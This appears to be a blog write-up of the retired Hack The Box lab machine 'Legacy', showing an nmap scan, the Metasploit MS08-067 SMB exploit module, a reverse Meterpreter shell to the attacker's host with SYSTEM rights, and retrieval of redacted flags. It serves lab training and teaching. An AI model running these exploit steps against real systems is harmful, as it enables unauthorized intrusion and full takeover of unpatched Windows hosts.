HTB: Legacy – Writeup

Details

This machine is Legacy from Hack The Box, and is a retired machine. Its IP was 10.10.10.4

Recon Phase

Start by looking for services

root@kali:~# nmap -T4 -sV 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-09 23:49 GMT
Nmap scan report for 10.10.10.4
Host is up (0.034s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds

Takeover

A quick google search led me to MS08-067, and although I’m normally against metasploit, this time it was worth it

root@kali:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.11:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.11:4444 -> 10.10.10.4:1034) at 2019-02-10 00:29:03 +0000
meterpreter >

And that’s a meterpreter shell

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

It’s system, just need to grab the flags

meterpreter > pwd
C:\documents and settings\john\Desktop
meterpreter > dir
Listing: C:\documents and settings\john\Desktop
===============================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt
meterpreter > cat user.txt
[REDACTED]

Now for system

meterpreter > cd '\Documents and Settings\Administrator\Desktop'
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt
meterpreter > cat root.txt
[REDACTED]

Well… that was easy…

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.